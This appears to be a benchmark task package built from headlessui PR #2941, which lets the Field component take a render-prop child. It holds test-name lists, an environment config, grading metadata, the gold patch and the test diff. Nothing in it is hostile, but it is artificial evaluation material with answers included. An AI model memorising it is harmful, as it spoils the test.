possible to open the combobox with ArrowDown, and focus the selected option", "should be possible to open the combobox with ArrowUp and the last option should be active", "should not be possible to open the combobox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the combobox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the combobox options and jump to the first non-disabled one", "should be possible to close the combobox with Enter and choose the active combobox option", "pressing Tab should select the active item and move to the next DOM node", "pressing Shift+Tab should select the active item and move to the previous DOM node", "should bubble escape when using `static` on Combobox.Options", "should bubble escape when not using Combobox.Options at all", "should sync the input field correctly and reset it when pressing Escape", "should be possible to use ArrowDown to navigate the combobox options", "should be possible to use ArrowDown to navigate the combobox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the combobox options and jump to the first non-disabled one", "should be possible to go to the next item if no value is set", "should be possible to use ArrowUp to navigate the combobox options", "should be possible to use the End key to go to the last combobox option", "should be possible to use the End key to go to the last non disabled combobox option", "should be possible to use the End key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon End key press, when there are no non-disabled combobox options", "should be possible to use the PageDown key to go to the last combobox option", "should be possible to use the PageDown key to go to the last non disabled Combobox option", "should be possible to use the PageDown key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageDown key press, when there are no non-disabled combobox options", "should be possible to use the Home key to go to the first combobox option", "should be possible to use the Home key to go to the first non disabled combobox option", "should be possible to use the Home key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon Home key press, when there are no non-disabled combobox options", "should be possible to use the PageUp key to go to the first combobox option", "should be possible to use the PageUp key to go to the first non disabled combobox option", "should be possible to use the PageUp key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageUp key press, when there are no non-disabled combobox options", "should reset the value when the last character is removed, when in `nullable` mode", "should not be possible to search and activate a disabled option", "should maintain activeIndex and activeOption when filtering", "should focus the ComboboxButton when we click the ComboboxLabel", "should not focus the ComboboxInput when we right click the ComboboxLabel", "should be possible to open the combobox by focusing the input with immediate mode enabled", "should not be possible to open the combobox by focusing the input with immediate mode disabled", "should not be possible to open the combobox by focusing the input with immediate mode enabled when button is disabled", "should be possible to close a combobox on click with immediate mode enabled", "should be possible to close a focused combobox on click with immediate mode enabled", "should be possible to open the combobox on click", "should not be possible to open the combobox on right click", "should not be possible to open the combobox on click when the button is disabled", "should be possible to open the combobox on click, and focus the selected option", "should be possible to close a combobox on click", "should be a no-op when we click outside of a closed combobox", "should be possible to click outside of the combobox on another combobox button which should close the current combobox and open the new combobox", "should be possible to click outside of the combobox which should close the combobox (even if we press the combobox button)", "should be possible to click outside of the combobox, on an element which is within a focusable element, which closes the combobox", "should be possible to hover an option and make it active when using `static`", "should make a combobox option active when you move the mouse over it", "should be a no-op when we move the mouse and the combobox option is already active", "should be a no-op when we move the mouse and the combobox option is disabled", "should be possible to click a combobox option, which closes the combobox", "should be possible to click a combobox option, which closes the combobox with immediate mode enabled", "should be possible to click a disabled combobox option, which is a no-op", "should be possible focus a combobox option, so that it becomes active", "should not be possible to focus a combobox option which is disabled", "should be possible to hold the last active option", "should sync the input field correctly and reset it when resetting the value from outside (to null)", "should sync the input field correctly and reset it when resetting the value from outside (to undefined)", "should sync the input field correctly and reset it when resetting the value from outside (when using displayValue)", "should be possible to pass multiple values to the Combobox component", "should keep the combobox open when selecting an item via the keyboard", "should reset the active option, if the active option gets unmounted", "should error when we are using a <Combobox.Button /> without a parent <Combobox />", "should error when we are using a <Combobox.Label /> without a parent <Combobox />", "should error when we are using a <Combobox.Options /> without a parent <Combobox />", "should error when we are using a <Combobox.Option /> without a parent <Combobox />", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when value is undefined)", "should be possible to render a Combobox.Label using a render prop", "should be possible to render a Combobox.Label using a render prop and an `as` prop", "should be possible to render a Combobox.Button using a render prop", "should be possible to render a Combobox.Button using a render prop and an `as` prop", "should be possible to render a Combobox.Button and a Combobox.Label and see them linked together", "should be possible to render Combobox.Options using a render prop", "should be possible to always render the Combobox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Combobox.Options", "should be possible to render a Combobox.Option using a render prop", "should be possible to wrap the Combobox.Options with a Transition component", "should be possible to open the combobox with Enter", "should be possible to use the PageDown key to go to the last non disabled combobox option", "should focus the Combobox.Input when we click the Combobox.Label", "should not focus the Combobox.Input when we right click the Combobox.Label", "should warn when changing the combobox from uncontrolled to controlled", "should warn when changing the combobox from controlled to uncontrolled" ]
Method: Tab (React) render prop argument <TabRenderPropArg> Location: packages/@headlessui-react/src/components/tabs/tabs.tsx → type TabRenderPropArg Inputs: - selected: boolean – whether the tab is currently selected. - active: boolean – whether the tab is the active (focused) element. - focus: boolean – whether the tab has keyboard focus. - autofocus: boolean – whether the tab should automatically receive focus on mount. - disabled: boolean – whether the tab is disabled (exposed via `props.disabled ?? false`; defaults to false). Outputs: The object is supplied to the child‑render‑function of `<Tab />`. Tests assert that `disabled` is present and equal to `false` when the component is rendered without the prop. Function: Tab slot payload (Vue) <TabSlotProps> Location: packages/@headlessui-vue/src/components/tabs/tabs.ts → slot object returned in render function Inputs: - selected: boolean – whether the tab is currently selected. - disabled: boolean – whether the tab is disabled (exposed via `props.disabled ?? false`; defaults to false). Outputs: The slot object is made available to the default slot of `<Tab />`. Tests verify that the JSON string rendered from the slot includes `"disabled": false`.
MIT
{ "base_image_name": "node_20", "install": [ "npm ci --prefer-offline --no-audit --progress=false" ], "log_parser": "parse_log_js_4", "test_cmd": "npm test -- --verbose --no-colors" }
{ "num_modified_files": 4, "num_modified_lines": 11, "pr_author": "RobinMalfait", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.94, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue asks to expose a `disabled` state on the <Tab/> component so that it appears in the render-prop arguments and can be used with utility classes. The supplied test patch adds expectations for a `disabled` flag (default false) in the render output, which directly matches the requested behavior. No external dependencies, naming constraints, or ambiguous specifications are present, and the tests align with the stated requirement, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
f2bc6fdd4021969fb0ddeada980d5996fc106790
2024-01-23 12:58:01
tailwindlabs__headlessui-2941
diff --git a/packages/@headlessui-react/CHANGELOG.md b/packages/@headlessui-react/CHANGELOG.md index f98abbf..52d371a 100644 --- a/packages/@headlessui-react/CHANGELOG.md +++ b/packages/@headlessui-react/CHANGELOG.md @@ -12,6 +12,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Expose `disabled` state on `<Tab />` component ([#2918](https://github.com/tailwindlabs/headlessui/pull/2918)) - Prevent default behaviour when clicking outside of a `Dialog.Panel` ([#2919](https://github.com/tailwindlabs/headlessui/pull/2919)) - Use `isFocused` instead of `isFocusVisible` for `Input` and `Textarea` components ([#2940](https://github.com/tailwindlabs/headlessui/pull/2940)) +- Ensure `children` prop of `Field` component can be a render prop ([#2941](https://github.com/tailwindlabs/headlessui/pull/2941)) ## [2.0.0-alpha.4] - 2024-01-03 diff --git a/packages/@headlessui-react/src/components/field/field.tsx b/packages/@headlessui-react/src/components/field/field.tsx index 0a22218..d770c16 100644 --- a/packages/@headlessui-react/src/components/field/field.tsx +++ b/packages/@headlessui-react/src/components/field/field.tsx @@ -53,7 +53,13 @@ function FieldFn<TTag extends ElementType = typeof DEFAULT_FIELD_TAG>( ourProps, theirProps: { ...theirProps, - children: <FormFieldsProvider>{theirProps.children}</FormFieldsProvider>, + children: ( + <FormFieldsProvider> + {typeof theirProps.children === 'function' + ? theirProps.children(slot) + : theirProps.children} + </FormFieldsProvider> + ), }, slot, defaultTag: DEFAULT_FIELD_TAG,
Ensure `children` prop of `Field` component can be a render prop This PR ensures that the `Field` can be used using a render prop as the children of the `Field` component. This means that we can now do this again: ```tsx <Field> {({ disabled }) => { return <input className={disabled ? "..." : "..."} />; }} </Field> ``` This normally works in every component, but it was missing because we were manually wrapping the children in a component and forgot to handle this case.
**Title** Allow `Field` component to accept a render‑prop as its children **Problem** The `Field` component could only render static JSX children. When a function (render prop) was passed, it was treated as a regular node, preventing access to the field’s internal state (e.g., `disabled`). This broke the common pattern of using `Field` with a render‑prop child. **Root Cause** `Field` unconditionally wrapped its children with a provider component, never invoking the child when it was a function. **Fix / Expected Behavior** - `Field` now detects if its children are a function. - If so, it calls the function with the field’s slot data and renders the result. - Non‑function children continue to be rendered unchanged, still inside the provider context. - The provider remains in place for both cases, preserving context propagation. - Type definitions reflect that `children` may be a render‑prop function. **Risk & Validation** - Verify that existing static children still render correctly and retain context. - Add tests for the render‑prop usage to ensure `slot` values (e.g., `disabled`) are received. - Run the full test suite to confirm no regressions in related components.
2,941
tailwindlabs/headlessui
diff --git a/packages/@headlessui-react/src/components/field/field.test.tsx b/packages/@headlessui-react/src/components/field/field.test.tsx index 0ec7dd2..d1c8b88 100644 --- a/packages/@headlessui-react/src/components/field/field.test.tsx +++ b/packages/@headlessui-react/src/components/field/field.test.tsx @@ -14,6 +14,25 @@ describe('Rendering', () => { expect(container.firstChild).not.toHaveAttribute('aria-disabled', 'true') }) + it('should render a `Field` component with a render prop', async () => { + let { container } = render( + <Field> + {(slot) => { + return ( + <div data-slot={JSON.stringify(slot)}> + <input /> + </div> + ) + }} + </Field> + ) + + expect(container.querySelector('[data-slot]')?.getAttribute('data-slot')).toEqual( + JSON.stringify({ disabled: false }) + ) + expect(container.firstChild).not.toHaveAttribute('aria-disabled', 'true') + }) + it('should add `aria-disabled` when a `Field` is disabled', async () => { let { container } = render( <Field disabled>
[ "should wait the correct amount of time to finish a transition", "should render a `Field` component with a render prop", "should transition in and out completely" ]
[ "should be possible to server side render the Disclosure in a closed state", "should be possible to server side render the Disclosure in an open state", "should be possible to inert an element", "should not mark an element as inert when the hook is disabled", "should mark the element as not inert anymore, once all references are gone", "should expose the correct components", "A transition without appear=true does not insert classes during SSR", "should not overwrite className of children when as=Fragment", "should be possible to transition", "should expose focus data attributes on the element", "should expose hover data attributes on the element", "should be possible to get the text value from an element", "should strip out emojis when receiving the text from the element", "should strip out hidden elements", "should strip out aria-hidden elements", "should strip out role=\"img\" elements", "should be possible to get the text value from the aria-label", "should be possible to get the text value from the aria-label (even if there is content)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`, multiple)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents, multiple)", "should be possible to use useDescriptions without using a Description", "should be possible to use useDescriptions and a single Description, and have them linked", "should be possible to use useDescriptions and multiple Description components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Description component", "should be possible to use a LabelProvider without using a Label", "should be possible to use a LabelProvider and a single Label, and have them linked", "should be possible to use a LabelProvider and multiple Label components, and have them linked", "should be possible to use a DescriptionProvider without using a Description", "should be possible to use a DescriptionProvider and a single Description, and have them linked", "should be possible to use a DescriptionProvider and multiple Description components, and have them linked", "should be possible to server side render the first Tab and Panel", "should be possible to server side render the defaultIndex Tab and Panel", "should error when using an as=\"template\" with additional props", "should forward the props to the first child", "should forward the props via Functional Components", "should allow use of <slot> as children", "as=element", "as=template", "should encode an input of {\"a\":\"b\"} to an form data output", "should encode an input of [1,2,3] to an form data output", "should encode an input of {\"id\":1,\"admin\":true,\"name\":{\"first\":\"Jane\",\"last\":\"Doe\",\"nickname\":{\"preferred\":\"JDoe\"}}} to an form data output", "should be possible to use a Portal", "should be possible to use multiple Portal elements", "should cleanup the Portal root when the last Portal is unmounted", "should be possible to render multiple portals at the same time", "should be possible to tamper with the modal root and restore correctly", "should be possible to force the Portal into a specific element using Portal.Group", "should be possible to cancel a transition at any time", "should be possible to render a dummy component", "should be possible to merge classes when rendering", "should be possible to merge class fns when rendering", "should be possible to render a dummy component with some children as a callback", "should be possible to add a ref with a different name", "should be possible to passthrough props to a dummy component", "should be possible to change the underlying DOM node using the `as` prop", "should be possible to change the underlying DOM node using the `as` prop and still have a function as children", "should be possible to render the children only when the `as` prop is set to Fragment", "should forward all the props to the first child when using an as={Fragment}", "should error when we are rendering a Fragment with multiple children", "should not error when we are rendering a Fragment with multiple children when we don't passthrough additional props", "should error when we are applying props to a Fragment when we do not have a dedicated element", "should be possible to render a `static` dummy component (show = true)", "should be possible to render a `static` dummy component (show = false)", "should be possible to render an `unmount` dummy component (show = true)", "should be possible to render an `unmount` dummy component (show = false)", "should be possible to render an `unmount={false}` dummy component (show = true)", "should be possible to render an `unmount={false}` dummy component (show = false)", "should result in a typescript error", "should be possible to use useLabels without using a Label", "should be possible to use useLabels and a single Label, and have them linked", "should be possible to use useLabels and multiple Label components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Label component", "should render a `Fieldset` component", "should add an `aria-disabled` attribute when disabling the `Fieldset`", "should link a `Fieldset` to a nested `Legend`", "should not link a `Label` inside a `Field` to the `Fieldset`", "should render a button", "should default to `type=\"button\"`", "should render a button using a render prop", "should map the `autoFocus` prop to a `data-autofocus` attribute", "should be possible to server side render the selectedIndex=0 Tab and Panel", "should be possible to server side render the selectedIndex=1 Tab and Panel", "should render a `Field` component", "should add `aria-disabled` when a `Field` is disabled", "should inherit the `disabled` state from a parent `Fieldset`", "SSR-rendering a Portal should not error", "should be possible to force the Portal into a specific element using PortalGroup", "should fire the correct events 0", "should fire the correct events 1", "should fire the correct events 2", "should fire the correct events 3", "should fire the correct events 4", "should fire the correct events 5", "should fire the correct events 6", "should fire the correct events 7", "should fire the correct events 8", "should fire the correct events 9", "should fire the correct events 10", "should fire the correct events 11", "should fire the correct events 12", "should fire the correct events 13", "should fire the correct events 14", "should fire the correct events 15", "should fire the correct events 16", "should fire the correct events 17", "should fire the correct events 18", "should fire the correct events 19", "should fire the correct events 20", "should fire the correct events 21", "should error when we are using a <Disclosure.Button /> without a parent <Disclosure />", "should error when we are using a <Disclosure.Panel /> without a parent <Disclosure />", "should be possible to render a Disclosure without crashing", "should be possible to render a Disclosure using a render prop", "should be possible to render a Disclosure in an open state by default", "should expose a close function that closes the disclosure", "should expose a close function that closes the disclosure and restores to a specific element", "should expose a close function that closes the disclosure and restores to a ref", "should not crash when using Suspense boundaries", "should be possible to render a Disclosure.Button using a render prop", "should be possible to render a Disclosure.Button using a render prop and an `as` prop", "should set the `type` to \"button\" by default", "should not set the `type` to \"button\" if it already contains a `type`", "should set the `type` to \"button\" when using the `as` prop which resolves to a \"button\"", "should not set the type if the \"as\" prop is not a \"button\"", "should not set the `type` to \"button\" when using the `as` prop which resolves to a \"div\"", "should be possible to render Disclosure.Panel using a render prop", "should be possible to always render the Disclosure.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Disclosure.Panel", "should be possible to control the Disclosure.Panel by wrapping it in a Transition component", "should be possible to open the Disclosure with Enter", "should not be possible to open the disclosure with Enter when the button is disabled", "should be possible to close the disclosure with Enter when the disclosure is open", "should be possible to open the disclosure with Space", "should not be possible to open the disclosure with Space when the button is disabled", "should be possible to close the disclosure with Space when the disclosure is open", "should be possible to open a disclosure on click", "should not be possible to open a disclosure on right click", "should not be possible to open a disclosure on click when the button is disabled", "should be possible to close a disclosure on click", "should be possible to close the Disclosure by clicking on a Disclosure.Button inside a Disclosure.Panel", "should focus the first focusable element inside the FocusTrap", "should focus the autoFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap even if another element has autoFocus", "should warn when there is no focusable element inside the FocusTrap", "should restore the previously focused element, before entering the FocusTrap, after the FocusTrap unmounts", "should stay in the FocusTrap when using `tab`, if there is only 1 focusable element", "should stay in the FocusTrap when using `shift+tab`, if there is only 1 focusable element", "should be possible tab to the next focusable element within the focus trap", "should be possible shift+tab to the previous focusable element within the focus trap", "should skip the initial \"hidden\" elements within the focus trap", "should be possible skip \"hidden\" elements within the focus trap", "should be possible skip disabled elements within the focus trap", "should not be possible to escape the FocusTrap due to strange tabIndex usage", "should render a control", "should have an `id` attached", "should be possible to override the `id`", "should mark the control as disabled, if the `Field` is disabled", "should link a control and a `Label` when inside a `Field`", "should link a control and multiple `Label` components when inside a `Field`", "should link a control and a `Description` when inside a `Field`", "should link a control and multiple `Description` components when inside a `Field`", "should link a control with a `Label` and a `Description` when inside a `Field`", "should be possible to click a `Label`, and focus the control when in a `Field`", "should not be possible to click a `Label`, if the `Label` has the `passive` prop", "should not be possible to click a `Label` and focus the control, if the control is disabled", "should not be possible to click a `Label` and focus the control, if the `Field` is disabled", "should not be possible to click a `Label` and focus the control, if the `Fieldset` is disabled", "should render native (hidden) form elements for the control", "should submit the form with all the data", "should reset the control when the form is reset", "should be possible to render a Switch without crashing", "should be possible to render an (on) Switch using a render prop", "should be possible to render an (off) Switch using a render prop", "should be possible to render an (on) Switch using an `as` prop", "should be possible to render an (off) Switch using an `as` prop", "should be possible to use the switch contents as the label", "should be possible to use in an uncontrolled way", "should be possible to use in an uncontrolled way with a value", "should be possible to provide a default value", "should be possible to reset to the default value if the form is reset", "should still call the onChange listeners when choosing new values", "should be possible to render a SwitchGroup, Switch and SwitchLabel", "should be possible to render a SwitchGroup, Switch and SwitchLabel (before the Switch)", "should be possible to render a SwitchGroup, Switch and SwitchLabel (after the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (after the Switch)", "should be possible to render a Switch.Group, Switch, Switch.Label and Switch.Description", "should be possible to put classes on a SwitchLabel", "should be possible to put classes on a SwitchDescription", "should be possible to put classes on a SwitchGroup", "should be possible to toggle the Switch with Space", "should not be possible to use Enter to toggle the Switch", "should submit the form on `Enter`", "should submit the form on `Enter` (when no submit button was found)", "should be possible to tab away from the Switch", "should be possible to toggle the Switch with a click", "should be possible to toggle the Switch with a click on the Label", "should not be possible to toggle the Switch with a click on the Label (passive)", "should be possible to set the `form`, which is forwarded to the hidden inputs", "should be possible to submit a form with an boolean value", "should be possible to submit a form with a provided string value", "should not be possible to programmatically escape the focus trap", "should be possible to tab to the next focusable element within the focus trap", "should be possible to shift+tab to the previous focusable element within the focus trap", "should be possible to render a Switch.Group, Switch and Switch.Label", "should be possible to render a Switch.Group, Switch and Switch.Label (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Label (after the Switch)", "should generate css for an exposed state", "should generate the inverse \"not\" css for an exposed state", "should generate the ui-focus-visible variant", "should generate the ui-not-focus-visible variant", "should error when we are using a <DisclosureButton /> without a parent <Disclosure />", "should error when we are using a <DisclosurePanel /> without a parent <Disclosure />", "should be possible to render a DisclosureButton using a render prop", "should be possible to render a DisclosureButton using a render prop and an `as` prop", "should be possible to render DisclosurePanel using a render prop", "should be possible to always render the DisclosurePanel if we provide it a `static` prop", "should be possible to use a different render strategy for the DisclosurePanel", "should always open the DisclosurePanel because of a wrapping OpenClosed component", "should always close the DisclosurePanel because of a wrapping OpenClosed component", "should be possible to read the OpenClosed state", "should be possible to close the Disclosure by clicking on a DisclosureButton inside a DisclosurePanel", "should be possible to put the checkbox in an indeterminate state", "should be possible to put the checkbox in an default checked state", "should render a checkbox in an unchecked state", "should be possible to toggle a checkbox", "should be possible to toggle a checkbox by clicking it", "should error when we are using a <RadioGroupOption /> without a parent <RadioGroup />", "should be possible to render a RadioGroup without crashing", "should be possible to render a RadioGroup without options and without crashing", "should be possible to render a RadioGroup, where the first element is tabbable (value is undefined)", "should be possible to render a RadioGroup, where the first element is tabbable (value is null)", "should be possible to render a RadioGroup with an active value", "should guarantee the radio option order after a few unmounts", "should be possible to render a RadioGroupOption with a render prop", "should set the checked v-slot info to true for the selected item (testing with objects, because Vue proxies)", "should be possible to put classes on a RadioGroup", "should be possible to put classes on a RadioGroupOption", "should be possible to disable a RadioGroup", "should be possible to disable a RadioGroup.Option", "should guarantee the order of DOM nodes when performing actions", "should be possible to use a custom component using the `as` prop without crashing", "should use object equality by default", "should be possible to compare null values by a field", "should be possible to compare objects by a field", "should be possible to compare objects by a comparator function", "should be possible to reset to the default value if the form is reset (using objects)", "should be possible to tab to the first item", "should not change the selected element on focus", "should be possible to tab to the active item", "should not change the selected element on focus (when selecting the active item)", "should be possible to tab out of the radio group (no selected value)", "should be possible to tab out of the radio group (selected value)", "should go to the previous item when pressing the ArrowLeft key", "should go to the previous item when pressing the ArrowUp key", "should go to the next item when pressing the ArrowRight key", "should go to the next item when pressing the ArrowDown key", "should select the current option when pressing space", "should select the current option only once when pressing space", "should be possible to change the current radio group value when clicking on a radio option", "should be a no-op when clicking on the same item", "should be possible to submit a form with a value", "should be possible to submit a form with a complex value object", "should error when we are using a <RadioGroup.Option /> without a parent <RadioGroup />", "should expose internal data as a render prop", "should error when we are using a <PopoverButton /> without a parent <Popover />", "should error when we are using a <PopoverPanel /> without a parent <Popover />", "should error when we are using a <PopoverOverlay /> without a parent <Popover />", "should be possible to render a Popover without crashing", "should be possible to render a PopoverGroup with multiple Popover components", "should be possible to render a Popover using a render prop", "should expose a close function that closes the popover", "should expose a close function that closes the popover and restores to a specific element", "should expose a close function that closes the popover and restores to a ref", "should be possible to render a PopoverButton using a render prop", "should be possible to render a PopoverButton using a render prop and an `as` prop", "should be possible to render PopoverPanel using a render prop", "should be possible to always render the PopoverPanel if we provide it a `static` prop", "should be possible to use a different render strategy for the PopoverPanel", "should be possible to move the focus inside the panel to the first focusable element (very first link)", "should close the Popover, when PopoverPanel has the focus prop and you focus the open button", "should be possible to move the focus inside the panel to the first focusable element (skip hidden link)", "should be possible to move the focus inside the panel to the first focusable element (very first link) when the hidden render strategy is used", "should always open the PopoverPanel because of a wrapping OpenClosed component", "should always close the PopoverPanel because of a wrapping OpenClosed component", "should be possible to open the Popover with Enter", "should not be possible to open the popover with Enter when the button is disabled", "should be possible to close the popover with Enter when the popover is open", "should close other popover menus when we open a new one", "should close the Popover by pressing `Enter` on a PopoverButton inside a PopoverPanel", "should close the Popover menu, when pressing escape on the PopoverButton", "should close the Popover menu, when pressing escape on the PopoverPanel", "should be possible to close a sibling Popover when pressing escape on a sibling PopoverButton", "should be possible to Tab through the panel contents onto the next PopoverButton", "should be possible to place a focusable item in the PopoverGroup, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the PopoverGroup", "should close the Popover menu once we Tab out of the Popover", "should close the Popover menu once we Tab out of a Popover without focusable elements", "should close the Popover when the PopoverPanel has a focus prop", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal)", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal), and focus the next focusable item in line", "should focus the previous PopoverButton when Shift+Tab on the second PopoverButton", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel (inside a Portal)", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (heuristc based portal)", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton (using Portal's)", "should be possible to open the popover with Space", "should not be possible to open the popover with Space when the button is disabled", "should be possible to close the popover with Space when the popover is open", "should close the Popover by pressing `Space` on a PopoverButton inside a PopoverPanel", "should close the Popover by pressing `Enter` on a PopoverButton and go to the href of the `a` inside a PopoverPanel", "should be possible to open a popover on click", "should not be possible to open a popover on right click", "should not be possible to open a popover on click when the button is disabled", "should be possible to close a popover on click", "should be possible to close a Popover using a click on the PopoverOverlay", "should be possible to close the popover, and re-focus the button when we click outside on the body element", "should be possible to close the popover, and re-focus the button when we click outside on a non-focusable element", "should be possible to close the popover, by clicking outside the popover on another focusable element", "should be possible to close the popover, by clicking outside the popover on another element inside a focusable element", "should be possible to close the Popover by clicking on a PopoverButton inside a PopoverPanel", "should not close the Popover when clicking on a focusable element inside a static PopoverPanel", "should not close the Popover when clicking on a non-focusable element inside a static PopoverPanel", "should close the Popover when clicking outside of a static PopoverPanel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel (when using the `focus` prop)", "should not close the Popover if the focus is moved outside of the Popover but still in the same React tree using Portals", "should not close the Popover if the focus is moved outside of the Popover but still in the same React tree using nested Portals", "should be possible to nest Popover components and control them individually", "should error when we are using a <Menu.Button /> without a parent <Menu />", "should error when we are using a <Menu.Items /> without a parent <Menu />", "should error when we are using a <Menu.Item /> without a parent <Menu />", "should be possible to render a Menu without crashing", "should be possible to render a Menu using a render prop", "should be possible to manually close the Menu using the exposed close function", "should be possible to render a Menu.Button using a render prop", "should be possible to render a Menu.Button using a render prop and an `as` prop", "should be possible to render Menu.Items using a render prop", "should be possible to always render the Menu.Items if we provide it a `static` prop", "should be possible to use a different render strategy for the Menu.Items", "should be possible to render a Menu.Item using a render prop", "should not override an explicit disabled prop on MenuItems child", "should be possible to conditionally render classNames (aka className can be a function?!)", "should be possible to swap the menu item with a button for example", "should mark all the elements between Menu.Items and Menu.Item with role none", "should be possible to wrap the Menu.Items with a Transition component", "should be possible to wrap the Menu.Items with a Transition.Child component", "should be possible to use a button as a menu item and invoke it upon Enter", "should be possible to open the menu with Enter", "should not be possible to open the menu with Enter when the button is disabled", "should have no active menu item when there are no menu items at all", "should focus the first non disabled menu item when opening with Enter", "should focus the first non disabled menu item when opening with Enter (jump over multiple disabled ones)", "should have no active menu item upon Enter key press, when there are no non-disabled menu items", "should be possible to close the menu with Enter when there is no active menuitem", "should be possible to close the menu with Enter and invoke the active menu item", "should be possible to open the menu with Space", "should not be possible to open the menu with Space when the button is disabled", "should focus the first non disabled menu item when opening with Space", "should focus the first non disabled menu item when opening with Space (jump over multiple disabled ones)", "should have no active menu item upon Space key press, when there are no non-disabled menu items", "should be possible to close the menu with Space when there is no active menuitem", "should be possible to close the menu with Space and invoke the active menu item", "should be possible to close an open menu with Escape", "should close when we use Tab", "should focus trap when we use Shift+Tab", "should be possible to open the menu with ArrowDown", "should not be possible to open the menu with ArrowDown when the button is disabled", "should be possible to use ArrowDown to navigate the menu items", "should be possible to use ArrowDown to navigate the menu items and skip the first disabled one", "should be possible to use ArrowDown to navigate the menu items and jump to the first non-disabled one", "should be possible to open the menu with ArrowUp and the last item should be active", "should not be possible to open the menu with ArrowUp and the last item should be active when the button is disabled", "should be possible to use ArrowUp to navigate the menu items and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled item", "should be possible to use ArrowUp to navigate the menu items", "should be possible to use the End key to go to the last menu item", "should be possible to use the End key to go to the last non disabled menu item", "should be possible to use the End key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon End key press, when there are no non-disabled menu items", "should be possible to use the PageDown key to go to the last menu item", "should be possible to use the PageDown key to go to the last non disabled menu item", "should be possible to use the PageDown key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon PageDown key press, when there are no non-disabled menu items", "should be possible to use the Home key to go to the first menu item", "should be possible to use the Home key to go to the first non disabled menu item", "should be possible to use the Home key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon Home key press, when there are no non-disabled menu items", "should be possible to use the PageUp key to go to the first menu item", "should be possible to use the PageUp key to go to the first non disabled menu item", "should be possible to use the PageUp key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon PageUp key press, when there are no non-disabled menu items", "should be possible to type a full word that has a perfect match", "should be possible to type a partial of a word", "should be possible to type words with spaces", "should not be possible to search for a disabled item", "should be possible to search for a word (case insensitive)", "should be possible to search for the next occurence", "should stay on the same item while keystrokes still match", "should be possible to open a menu on click", "should not be possible to open a menu on right click", "should not be possible to open a menu on click when the button is disabled", "should be possible to close a menu on click", "should be a no-op when we click outside of a closed menu", "should be possible to click outside of the menu which should close the menu", "should be possible to click outside of the menu which should close the menu (even if we press the menu button)", "should be possible to click outside of the menu on another menu button which should close the current menu and open the new menu", "should be possible to click outside of the menu, on an element which is within a focusable element, which closes the menu", "should be possible to hover an item and make it active", "should make a menu item active when you move the mouse over it", "should be a no-op when we move the mouse and the menu item is already active", "should be a no-op when we move the mouse and the menu item is disabled", "should not be possible to hover an item that is disabled", "should be possible to mouse leave an item and make it inactive", "should be possible to mouse leave a disabled item and be a no-op", "should be possible to click a menu item, which closes the menu", "should be possible to click a menu item, which closes the menu and invokes the @click handler", "should be possible to click a disabled menu item, which is a no-op", "should be possible focus a menu item, so that it becomes active", "should not be possible to focus a menu item which is disabled", "should not be possible to activate a disabled item", "should error when we are using a <MenuButton /> without a parent <Menu />", "should error when we are using a <MenuItems /> without a parent <Menu />", "should error when we are using a <MenuItem /> without a parent <Menu />", "should not crash when rendering no children at all", "should be possible to render a Menu using a default render prop", "should be possible to render a Menu 